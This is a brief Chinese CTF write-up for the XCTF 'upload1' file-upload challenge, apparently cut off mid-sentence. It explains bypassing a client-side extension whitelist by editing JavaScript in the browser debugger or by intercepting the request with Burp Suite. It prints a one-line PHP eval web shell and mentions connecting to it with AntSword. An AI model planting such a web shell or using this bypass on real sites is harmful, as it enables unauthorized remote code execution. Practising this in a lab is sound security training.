攻防世界 upload1解題思路兩種方式,JS前端修改和BP抓包修改

兩種方法 第一種前端修改JS內容 設置斷點,然後上傳shell.php文件。 然後點藍色三角頭,運行。再點向下箭頭進行單步執行。查看scope中的local找到上傳文件白名單將png改成php。然後執行藍色箭頭運行。 可以看到文件上傳成功。使用蟻劍就能進行連接了 這題還是比較簡單的,首先新建一個shell.php文件,內容如下<?php eval($_POST['pass']) ?>,然後改成sh
相關文章
相關標籤/搜索